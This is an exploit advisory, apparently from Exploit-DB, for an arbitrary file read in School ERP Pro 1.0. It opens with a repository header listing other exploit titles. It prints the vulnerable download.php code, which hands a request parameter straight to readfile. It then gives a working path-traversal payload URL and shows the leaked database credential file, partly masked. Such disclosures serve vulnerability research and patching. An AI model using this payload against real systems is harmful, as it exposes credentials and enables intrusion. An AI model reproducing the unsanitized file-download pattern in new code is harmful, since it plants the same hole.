a99d181f24
8 changes to exploits/shellcodes Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) EmEditor 19.8 - Insecure File Permissions Druva inSync Windows Client 6.5.2 - Local Privilege Escalation Open-AudIT Professional 3.3.1 - Remote Code Execution School ERP Pro 1.0 - Arbitrary File Read Easy Transfer 1.7 for iOS - Directory Traversal hits script 1.0 - 'item_name' SQL Injection
42 lines
No EOL
1.2 KiB
Text
42 lines
No EOL
1.2 KiB
Text
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
|
|
# Date: 2020-04-28
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: http://arox.in
|
|
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
|
|
# Version: latest version
|
|
# Tested on: Xampp
|
|
# Credit: İsmail BOZKURT
|
|
# CVE: N/A
|
|
|
|
Vulnerable code: (/student_staff/download.php)
|
|
- File Name: download.php
|
|
- Content of the download.php
|
|
|
|
<?php
|
|
if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
|
|
$file = $_REQUEST['document'];
|
|
header("Content-type: application/force-download");
|
|
header("Content-Transfer-Encoding: Binary");
|
|
header("Content-length: ".filesize($file));
|
|
header("Content-disposition: attachment; filename=\"".$file."\"");
|
|
readfile($file);
|
|
exit;
|
|
}
|
|
?>
|
|
|
|
------------
|
|
*Payload:*
|
|
---------------
|
|
|
|
http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
|
|
------------------------
|
|
*After run payload: (we accessed of the file content)*
|
|
------------------------
|
|
|
|
<?php
|
|
|
|
define('DB_SERVER', 'localhost');
|
|
define('DB_SERVER_USERNAME', 'aroxi********');
|
|
define('DB_SERVER_PASSWORD', 'erp**********');
|
|
define('DB_DATABASE', 'aroxi****************');
|
|
?> |